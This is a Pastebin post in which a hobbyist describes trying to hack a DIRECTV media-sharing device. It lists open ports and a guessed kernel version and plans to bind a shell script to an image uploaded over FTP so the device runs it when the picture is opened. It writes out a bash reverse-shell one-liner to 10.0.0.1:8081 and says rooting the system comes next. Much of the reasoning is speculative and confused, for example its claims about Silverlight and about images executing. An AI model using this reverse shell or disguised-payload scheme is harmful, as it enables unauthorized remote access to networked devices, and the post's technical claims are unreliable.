Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Re - Linking all of my old ' guest ' pastebins to one main account so i dont have to search for all of them through google
- Main PasteBin Link -> http://pastebin.com/VDcSTxdK
- -------------------------------------------------------------------------------------------------------
- [TV Hacking] DIRECTV
- This is a exploitation method in order to gain access to DIRECTV's device in he networksharing center its defined as DIRECTV server and media
- If you can understand everything i say below and can also help in the development of this much would be appreciated
- Thanks
- http://[ SITE TAKEN DOWN ]
- -------------------------------------------------------------------------------------------------------
- Hi guys in light of certain stuff that has happened to me in the past i am auditing my TV for certain reasons in doing so im going to just talk about my adventure in hacking the TV and providing what all i done - what happend - etc etc
- First thing is first
- DIRECTV Media Share - Requires Media Sharing open on the network
- My auditing report may be diff than your's as i am targeting something specific
- DIRECTV allows the use of external applications to be ran on the device such as
- chrome , netflix , etc etc
- My main target here is NetFlix - What am i wanting to do?
- Im wanting to log all connections that are being sent out and being sent in to the device.
- Now What does DIRECTV Have Open
- Port 5222
- Port 2121 - FTP Port ---Version uses OFTP
- OS: Linux
- Hacking Methods:
- First thing i want to do is be able to see if i can output data to the TV Screen - Im trying to lookup more information on how the Applications are programmed and what not and see if i can just use the API for printing messages and include it into a script and see if it could execute on the screen
- Steps To do Such:
- 1. We know that DIRECTV executes and writes data to files almost 24x7 - We are given FTP access however it is using the OFTP
- OFTP runs on non root and is protected from system root commands also prevents from viewing the whole entire directory or directories
- So what do we do now?
- Welll we know that the service is being ran off non root and we know that the folders structure is
- Android
- Data
- Videos
- Pictures
- etc..... etc....
- Well if we were to browse to the TV and go to my Pictures or videos and were to see pictures - What does that tell you?
- 1. We can force the System to execute a script from the FTP service as root
- Think about it
- We browse on the TV Screen
- Go to pictures
- ------
- While being at the computer you some how find a way to bind data to a image , video , etc etc and you place it in the FTP server
- --------
- now that your in the pictures screen - you now see your new image
- you then select it
- What happens?
- DIRECTV Executes the file - We also Binded a Backdoor to it
- What exactly did this backdoor have in it?
- Well we know that the Linux Kernel that is being used is Linux 2.6.17 - 2.6.36
- So we know also that DIRECTV uses Silverlight from Microsoft so we at least know it is using some standerd Microsoft Library/Include files
- So we do have the possibility for creating a TCP Connection
- We also know that it is using Linux
- And what does Linux have that we all like as a hacker ?
- the simple Back- Connect Reverse HTTP Send 1 Request
- By using the :)
- {bash -i >& /dev/tcp/10.0.0.1/8081 0>&1} #8080 is already in use - also i think this device runs WinRM also it has a xmpp-client as a service for port 5222 - still lookinh into that
- So we add a .file-name ( in reality is SH/BASH etc etc )
- Bind the file to the picture _ now remember we have a reverse back connect going on.
- After DIRECTV loads the image on screen you now have a Reverse Connection
- What next?
- Rooting the OS
- We know that the OS is Linux 2.6.17 - 2.6.36 -
- Now here is the part im going to have to do more research on - As its not just like simply rooting your ordinary linux system it requires much more then just that
- however i will update this thread as i go along
- If you guys have any suggestions or advice that you can help - Just tell me
- Will Be updated Soon
Add Comment
Please, Sign In to add comment